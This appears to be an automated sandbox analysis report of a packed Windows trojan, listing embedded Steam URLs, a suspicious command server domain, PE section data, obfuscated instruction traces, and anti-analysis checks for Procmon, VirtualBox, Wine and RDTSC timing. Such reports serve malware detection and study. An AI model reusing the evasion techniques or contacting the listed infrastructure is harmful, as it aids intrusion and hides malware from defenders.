    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&l=e
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.2076057849.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094713048.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/
    Source: file.exe, 00000000.00000002.2094713048.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/api
    Source: file.exe, 00000000.00000003.2076048362.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/apiq
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
    Source: file.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C02280_2_005C0228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F40400_2_005F4040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A0_2_0077205A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D0240_2_0076D024
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B10000_2_005B1000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C20300_2_005C2030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FA0D00_2_005FA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B51600_2_005B5160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B71F00_2_005B71F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE1A00_2_005BE1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E82D00_2_005E82D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E12D00_2_005E12D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B12F70_2_005B12F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BA3000_2_005BA300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E23E00_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B13A30_2_005B13A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BB3A00_2_005BB3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DC4700_2_005DC470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E64F00_2_005E64F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C049B0_2_005C049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C44870_2_005C4487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007705FB0_2_007705FB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC5F00_2_005CC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B85900_2_005B8590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B35B00_2_005B35B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077667C0_2_0077667C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F86520_2_005F8652
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B164F0_2_005B164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EF6200_2_005EF620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F86F00_2_005F86F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073175C0_2_0073175C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BA8500_2_005BA850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E18600_2_005E1860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EB8C00_2_005EB8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083F8280_2_0083F828
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EE8A00_2_005EE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D098B0_2_005D098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F89A00_2_005F89A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4A400_2_005F4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00778AE30_2_00778AE3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8A800_2_005F8A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7AB00_2_005F7AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CDB6F0_2_005CDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B7BF00_2_005B7BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076BB910_2_0076BB91
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00773B9F0_2_00773B9F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8C020_2_005F8C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DCCD00_2_005DCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F6CBF0_2_005F6CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D8D620_2_005D8D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DFD100_2_005DFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DDD290_2_005DDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DAE570_2_005DAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8E700_2_005F8E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C4E2A0_2_005C4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4EF10_2_006C4EF1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C6EBF0_2_005C6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BBEB00_2_005BBEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00737F7D0_2_00737F7D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BAF100_2_005BAF10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B8FD00_2_005B8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00731FEB0_2_00731FEB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7FC00_2_005F7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076EFC80_2_0076EFC8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684FA40_2_00684FA4
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 005BCAA0 appears 48 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 005CD300 appears 152 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995294451320133
    Source: file.exeStatic PE information: Section: trxxvdbn ZLIB complexity 0.9939460930295112
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E8220 CoCreateInstance,0_2_005E8220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: file.exeStatic file information: File size 1836032 > 1048576
    Source: file.exeStatic PE information: Raw size of trxxvdbn is bigger than: 0x100000 < 0x196a00

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.5b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;trxxvdbn:EW;psadlvyt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;trxxvdbn:EW;psadlvyt:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1cc9d0 should be: 0x1c4b45
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: trxxvdbn
    Source: file.exeStatic PE information: section name: psadlvyt
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], ebx0_2_00772061
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ebx; mov dword ptr [esp], edi0_2_00772065
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push edx; mov dword ptr [esp], ebp0_2_00772069
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 654D7FA0h; mov dword ptr [esp], ecx0_2_0077209C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push esi; mov dword ptr [esp], 6F7DCE23h0_2_007720B8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push esi; mov dword ptr [esp], eax0_2_007721CE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ebp; mov dword ptr [esp], 1F9B9A53h0_2_007721D2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ebp; mov dword ptr [esp], edx0_2_00772354
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push edi; mov dword ptr [esp], eax0_2_007723E8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], 672D9B2Bh0_2_00772425
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push esi; mov dword ptr [esp], ecx0_2_00772439
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push edx; mov dword ptr [esp], 79F3E496h0_2_00772480
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 7F09A515h; mov dword ptr [esp], ecx0_2_007724CB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push edx; mov dword ptr [esp], ebp0_2_0077256A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 792D2AC4h; mov dword ptr [esp], eax0_2_0077257F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], edx0_2_007725CF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 38C116FAh; mov dword ptr [esp], ecx0_2_00772603
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ecx; mov dword ptr [esp], esi0_2_00772675
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ecx; mov dword ptr [esp], 4925758Dh0_2_007726E9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], esi0_2_007726F4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push edx; mov dword ptr [esp], esi0_2_00772784
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 0F5A6FDAh; mov dword ptr [esp], edx0_2_00772834
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], edx0_2_00772875
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 15BFBFB1h; mov dword ptr [esp], edx0_2_007728CE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 29F630F1h; mov dword ptr [esp], eax0_2_007728ED
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push ebx; mov dword ptr [esp], edx0_2_00772909
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], edi0_2_0077292C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push eax; mov dword ptr [esp], esi0_2_00772984
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 3107D921h; mov dword ptr [esp], eax0_2_00772A04
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push 386C9B96h; mov dword ptr [esp], edx0_2_00772A42
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077205A push esi; mov dword ptr [esp], ecx0_2_00772AFB
    Source: file.exeStatic PE information: section name: entropy: 7.984616310053154
    Source: file.exeStatic PE information: section name: trxxvdbn entropy: 7.953378514979776

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D725 second address: 77D748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8B7h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D748 second address: 77D78F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D51h 0x00000007 jmp 00007FC834EB3D58h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC834EB3D56h 0x00000016 pop edi 0x00000017 rdtsc
